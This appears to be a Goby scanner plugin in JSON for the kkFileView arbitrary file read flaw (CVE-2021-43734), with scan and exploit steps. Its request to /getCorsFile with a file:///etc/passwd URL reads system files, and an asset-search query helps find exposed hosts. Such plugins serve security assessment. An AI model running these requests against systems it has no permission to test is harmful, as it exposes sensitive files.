Goby/json/kkFileView-Arbitrary-File-R...

144 lines
5.9 KiB
JSON
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

{
"Name": "kkFileView Arbitrary File Read Vulnerability (CVE-2021-43734)",
"Description": "<p>kkFileView is an online preview solution for file documents. The project is built using the popular spring boot, easy to use and deploy, and basically supports online preview of mainstream office documents, such as doc,docx,xls,xlsx,ppt,pptx,pdf,txt,zip , rar, pictures, video, audio, etc.<br></p><p>kkFileview v4.0.0 has a directory traversal vulnerability to read arbitrary files, which may lead to the leakage of sensitive files on related hosts.<br></p>",
"Product": "kkFileView",
"Homepage": "https://kkfileview.keking.cn/zh-cn/index.html",
"DisclosureDate": "2021-11-14",
"Author": "vikkieen",
"FofaQuery": "body=\"/onlinePreview?url=\"",
"GobyQuery": "body=\"/onlinePreview?url=\"",
"Level": "2",
"Impact": "<p>There is an arbitrary file read vulnerability in kkFileview v4.0.0, which may lead to the leakage of sensitive files on the relevant host.<br></p>",
"Recommendation": "<p>1. There is currently no detailed solution provided, please pay attention to the update of the manufacturer's homepage: <a href=\"https://kkfileview.keking.cn/zh-cn/index.html\">https://kkfileview.keking.cn/zh-cn/index.html</a></p><p>2. Set access policies and whitelist access through security devices such as firewalls.</p><p>3. If it is not necessary, it is forbidden to access the system from the public network.</p>",
"References": [
"https://github.com/kekingcn/kkFileView/issues/304"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [
{
"name": "urlPath",
"type": "input",
"value": "/etc/passwd",
"show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/getCorsFile?urlPath=file:///etc/passwd",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "regex",
"value": "root:.*:0:0:",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/getCorsFile?urlPath=file://{{{urlPath}}}",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody||"
]
}
],
"Tags": [
"Arbitrary File Read"
],
"VulType": [
"Arbitrary File Read"
],
"CVEIDs": [
"CVE-2021-43734"
],
"CNNVD": [
"CNNVD-202202-1272"
],
"CNVD": [
""
],
"CVSSScore": "7.5",
"Translation": {
"CN": {
"Name": "kkFileView 任意文件读取漏洞CVE-2021-43734",
"Product": "kkFileView",
"Description": "<p>kkFileView为文件文档在线预览解决方案该项目使用流行的spring boot搭建易上手和部署基本支持主流办公文档的在线预览如doc,docx,xls,xlsx,ppt,pptx,pdf,txt,zip,rar,图片,视频,音频等等<br></p><p><span style=\"font-size: 16.96px;\">kkFileview v4.0.0 存在通过目录遍历漏洞读取任意文件,可能导致相关主机上的敏感文件泄漏。</span><br></p>",
"Recommendation": "<p>1、目前没有详细的解决方案提供请关注厂商主页更新<a href=\"https://kkfileview.keking.cn/zh-cn/index.html\">https://kkfileview.keking.cn/zh-cn/index.html</a><br></p><p>2、通过防火墙等安全设备设置访问策略设置白名单访问。</p><p>3、如非必要禁止公网访问该系统。<br></p>",
"Impact": "<p><span style=\"color: rgb(22, 51, 102); font-size: 16.96px;\">kkFileview v4.0.0 存在任意文件读取漏洞,可能导致相关主机上的敏感文件泄漏。</span><br></p>",
"VulType": [
"任意文件读取"
],
"Tags": [
"任意文件读取"
]
},
"EN": {
"Name": "kkFileView Arbitrary File Read Vulnerability (CVE-2021-43734)",
"Product": "kkFileView",
"Description": "<p>kkFileView is an online preview solution for file documents. The project is built using the popular spring boot, easy to use and deploy, and basically supports online preview of mainstream office documents, such as doc,docx,xls,xlsx,ppt,pptx,pdf,txt,zip , rar, pictures, video, audio, etc.<br></p><p>kkFileview v4.0.0 has a directory traversal vulnerability to read arbitrary files, which may lead to the leakage of sensitive files on related hosts.<br></p>",
"Recommendation": "<p>1. There is currently no detailed solution provided, please pay attention to the update of the manufacturer's homepage: <a href=\"https://kkfileview.keking.cn/zh-cn/index.html\">https://kkfileview.keking.cn/zh-cn/index.html</a></p><p>2. Set access policies and whitelist access through security devices such as firewalls.</p><p>3. If it is not necessary, it is forbidden to access the system from the public network.</p>",
"Impact": "<p>There is an arbitrary file read vulnerability in kkFileview v4.0.0, which may lead to the leakage of sensitive files on the relevant host.<br></p>",
"VulType": [
"Arbitrary File Read"
],
"Tags": [
"Arbitrary File Read"
]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}